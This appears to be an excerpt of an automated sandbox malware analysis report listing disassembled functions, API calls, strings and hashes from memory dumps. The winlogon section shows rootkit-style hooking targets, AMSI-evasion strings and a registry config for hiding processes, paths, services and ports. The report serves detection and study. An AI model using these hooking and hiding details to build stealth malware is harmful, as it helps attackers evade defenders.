Instruction Fuzzy Hash: 90512726244FA181E634CEA5EE5C3AAE751FBA8783F050027FD59C3B89DB39C584C748

Function 0000025DC1AD2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000025DC1AD2778
GetLastError.KERNEL32 ref: 0000025DC1AD279D

Strings

U, xrefs: 0000025DC1AD2722

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: ab072a6ef71e85d4581bbc99c2cad0031f7bd7a7308479d1a0accccfed1d02fd
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 98410832615F9086E730DFA5E848799B7A0F368796F454123EE4DC7758EB38C402CB44

Function 0000025DC1CF2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000025DC1CF2778
GetLastError.KERNEL32 ref: 0000025DC1CF279D

Strings

U, xrefs: 0000025DC1CF2722

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 60064c6aa37c55ff05ffd7a15b45cffeb754c763f05f76282ecd3ed3c2d9374a
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: A241C572625E9086E720DFA5E948799F7A0F368786F904123FE4DC7758EB38C441CB44

Function 0000025DC1AC9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000025DC1AC91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,0000025DC1AC87F7), ref: 0000025DC1AC9209

Strings

csm, xrefs: 0000025DC1AC91F6

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 57ec76b929c903c733ba1129e19c542e02797c6763f310cd21a0a78c9084acb8
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 27116D32214F9082EB61CF15F818249B7E1F798B86F584225EE8D47B64DF3DC552CB04

Function 0000025DC1CE9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000025DC1CE91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,0000025DC1CE87F7), ref: 0000025DC1CE9209

Strings

csm, xrefs: 0000025DC1CE91F6

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 82c24117e6fb5a8825db6d564521dd899b9fa4a66bd1cca9450c04df6417d324
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 57115B36214F9082EB208B55F908249B7E1FB98B86F584225EF8D47B64DF3CC591CB04

Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

ntdll.dll, xrefs: 00000001400020D2

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318

Function 0000025DC1AC1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025DC1AC1D69
HeapAlloc.KERNEL32 ref: 0000025DC1AC1D77
GetProcessHeap.KERNEL32 ref: 0000025DC1AC1D9C
HeapFree.KERNEL32 ref: 0000025DC1AC1DAA

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 85407ee879b1079705a7b16661d2b25e22d96245c78d0ca4788dbf8a15dd403e
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: BC11A121701F90D1EE25EBA6A80815967B0FB99FC3F584025EE4E93724DF39C443C304

Function 0000025DC1CE1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025DC1CE1D69
HeapAlloc.KERNEL32 ref: 0000025DC1CE1D77
GetProcessHeap.KERNEL32 ref: 0000025DC1CE1D9C
HeapFree.KERNEL32 ref: 0000025DC1CE1DAA

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: dd7c4ac72d5c026372cbed03d50aa9230f7b7a5f3bdf86b428ecad56b97aa17f
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 0311A121601F9081EB25DBA6E908159A7A0FB99FC2F598025EF4E93764DF38D592C304

Function 0000025DC1AC1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025DC1AC126A
HeapAlloc.KERNEL32 ref: 0000025DC1AC1279
GetProcessHeap.KERNEL32 ref: 0000025DC1AC1293
HeapAlloc.KERNEL32 ref: 0000025DC1AC12A4

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 7cc3e49e006a54f78451ab734f67d6dbcd2643655b72cca602a0fa46560cc8a6
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 7CE03931601F14EAE728EBA2DC08389BAE1EB98B07F448024C90947350EF7D849AC740

Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90

Function 0000025DC1CE1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025DC1CE126A
HeapAlloc.KERNEL32 ref: 0000025DC1CE1279
GetProcessHeap.KERNEL32 ref: 0000025DC1CE1293
HeapAlloc.KERNEL32 ref: 0000025DC1CE12A4

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: cffbb45a6b71b3921716ba97c6c4691b09ce31f5b25b7820658caf4daebb763b
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 5CE03931601A14DAE724CBA2DC08389BAE1EB98B07F45C024DA0947350EF7D9499C740

Function 0000025DC1AC1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025DC1AC1006
HeapAlloc.KERNEL32 ref: 0000025DC1AC1015
GetProcessHeap.KERNEL32 ref: 0000025DC1AC1028
HeapAlloc.KERNEL32 ref: 0000025DC1AC1037

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: ac1cea37960e3f86114e76bf06c5417d6c8a03991ff373a24603d2f3bd8e46b9
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: C9E0ED71611F14EAE728EBA2DC08299BAB1FB98B17F448025C90947310EE38849AD614

Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

Function 0000025DC1CE1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025DC1CE1006
HeapAlloc.KERNEL32 ref: 0000025DC1CE1015
GetProcessHeap.KERNEL32 ref: 0000025DC1CE1028
HeapAlloc.KERNEL32 ref: 0000025DC1CE1037

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 5a18f94454edba8b3f9012ebf842908f8e43cf1d5d16e0885732ae35777ff7f8
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: CDE06D71611914DAE728CBA2DC08288B6A1FB98B03F45C021DA0947350EE389498D610

Analysis Process: winlogon.exePID: 552, Parent PID: 2844COMMON

Executed Functions

Function 00000225DC641724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000225DC64172F
HeapAlloc.KERNEL32 ref: 00000225DC64173E

Part of subcall function 00000225DC641264: GetProcessHeap.KERNEL32 ref: 00000225DC64126A
Part of subcall function 00000225DC641264: HeapAlloc.KERNEL32 ref: 00000225DC641279
Part of subcall function 00000225DC641264: GetProcessHeap.KERNEL32 ref: 00000225DC641293
Part of subcall function 00000225DC641264: HeapAlloc.KERNEL32 ref: 00000225DC6412A4

Part of subcall function 00000225DC641000: GetProcessHeap.KERNEL32 ref: 00000225DC641006
Part of subcall function 00000225DC641000: HeapAlloc.KERNEL32 ref: 00000225DC641015
Part of subcall function 00000225DC641000: GetProcessHeap.KERNEL32 ref: 00000225DC641028
Part of subcall function 00000225DC641000: HeapAlloc.KERNEL32 ref: 00000225DC641037

RegOpenKeyExW.KERNELBASE ref: 00000225DC6417AE
RegOpenKeyExW.KERNELBASE ref: 00000225DC6417DB
RegCloseKey.ADVAPI32 ref: 00000225DC6417F5
RegOpenKeyExW.KERNELBASE ref: 00000225DC641815
RegCloseKey.KERNELBASE ref: 00000225DC641830
RegOpenKeyExW.KERNELBASE ref: 00000225DC641850
RegCloseKey.ADVAPI32 ref: 00000225DC64186B
RegOpenKeyExW.KERNELBASE ref: 00000225DC64188B
RegCloseKey.ADVAPI32 ref: 00000225DC6418A6
RegOpenKeyExW.KERNELBASE ref: 00000225DC6418C6
RegCloseKey.ADVAPI32 ref: 00000225DC6418E1
RegOpenKeyExW.KERNELBASE ref: 00000225DC641901
RegCloseKey.ADVAPI32 ref: 00000225DC64191C
RegOpenKeyExW.KERNELBASE ref: 00000225DC64193C
RegCloseKey.ADVAPI32 ref: 00000225DC641957
RegOpenKeyExW.KERNELBASE ref: 00000225DC641977
RegCloseKey.ADVAPI32 ref: 00000225DC641992
RegCloseKey.KERNELBASE ref: 00000225DC64199C

Part of subcall function 00000225DC6412B8: RegQueryInfoKeyW.ADVAPI32 ref: 00000225DC641315
Part of subcall function 00000225DC6412B8: GetProcessHeap.KERNEL32 ref: 00000225DC641323
Part of subcall function 00000225DC6412B8: HeapAlloc.KERNEL32 ref: 00000225DC641334
Part of subcall function 00000225DC6412B8: RegEnumValueW.ADVAPI32 ref: 00000225DC641393
Part of subcall function 00000225DC6412B8: GetProcessHeap.KERNEL32 ref: 00000225DC6413DB
Part of subcall function 00000225DC6412B8: HeapAlloc.KERNEL32 ref: 00000225DC6413E9
Part of subcall function 00000225DC6412B8: GetProcessHeap.KERNEL32 ref: 00000225DC641406
Part of subcall function 00000225DC6412B8: HeapFree.KERNEL32 ref: 00000225DC641414
Part of subcall function 00000225DC6412B8: lstrlenW.KERNEL32 ref: 00000225DC64141D
Part of subcall function 00000225DC6412B8: GetProcessHeap.KERNEL32 ref: 00000225DC64142B
Part of subcall function 00000225DC6412B8: HeapAlloc.KERNEL32 ref: 00000225DC641439

Strings

process_names, xrefs: 00000225DC641849
tcp_remote, xrefs: 00000225DC641935
startup, xrefs: 00000225DC6417D1
pid, xrefs: 00000225DC64180E
udp, xrefs: 00000225DC641970
service_names, xrefs: 00000225DC6418BF
SOFTWARE\$rbx-config, xrefs: 00000225DC64178E
tcp_local, xrefs: 00000225DC6418FA
paths, xrefs: 00000225DC641884

Memory Dump Source

Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: c163acaebe60ea4311e68be09e509954e4c92294b53dd205c1ff3ab862208a51
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 4771133A724E61A6EB109FA9E85869D3374FB88B8AF909112DD4E57B68EF34C444C740

Function 00000225DC641E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000225DC641E7F

Part of subcall function 00000225DC6422A8: GetModuleHandleA.KERNEL32(?,?,?,00000225DC641EB1), ref: 00000225DC6422C0
Part of subcall function 00000225DC6422A8: GetProcAddress.KERNEL32(?,?,?,00000225DC641EB1), ref: 00000225DC6422D1

CreateThread.KERNELBASE ref: 00000225DC642043
TlsAlloc.KERNEL32 ref: 00000225DC642049
TlsAlloc.KERNEL32 ref: 00000225DC642055
TlsAlloc.KERNEL32 ref: 00000225DC642061
TlsAlloc.KERNEL32 ref: 00000225DC64206D
TlsAlloc.KERNEL32 ref: 00000225DC642079
TlsAlloc.KERNEL32 ref: 00000225DC642085

Strings

pdh.dll, xrefs: 00000225DC641FD7, 00000225DC641FF8
EnumServicesStatusExW, xrefs: 00000225DC641F71, 00000225DC641F92
PdhGetFormattedCounterArrayW, xrefs: 00000225DC641FF1
NtEnumerateValueKey, xrefs: 00000225DC641F36
advapi32.dll, xrefs: 00000225DC641F57, 00000225DC641F78
sechost.dll, xrefs: 00000225DC641F99
AmsiScanBuffer, xrefs: 00000225DC642012
PdhGetRawCounterArrayW, xrefs: 00000225DC641FD0
NtResumeThread, xrefs: 00000225DC641EC2
ntdll.dll, xrefs: 00000225DC641E8D
NtDeviceIoControlFile, xrefs: 00000225DC641FB6
NtEnumerateKey, xrefs: 00000225DC641F19
NtQuerySystemInformation, xrefs: 00000225DC641EA5
NtQueryDirectoryFile, xrefs: 00000225DC641EDF
EnumServiceGroupW, xrefs: 00000225DC641F50
amsi.dll, xrefs: 00000225DC642019
NtQueryDirectoryFileEx, xrefs: 00000225DC641EFC

Memory Dump Source

Source File: 00000027.00000002.2993097528.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true

Associated: 00000027.00000002.2991676630.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2994878482.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2996210967.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2997549286.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000027.00000002.2998814857.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_225dc640000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: f29ca842126068601b63f5b890003817ffb932e00ebe5f9bb7d400ae7e1bf134
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 96519D6C568E6AB6EB01EFECEC5C7D93720A74474BFA0C593940A52175EF3C825AC340

Function 00000225DC646270 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

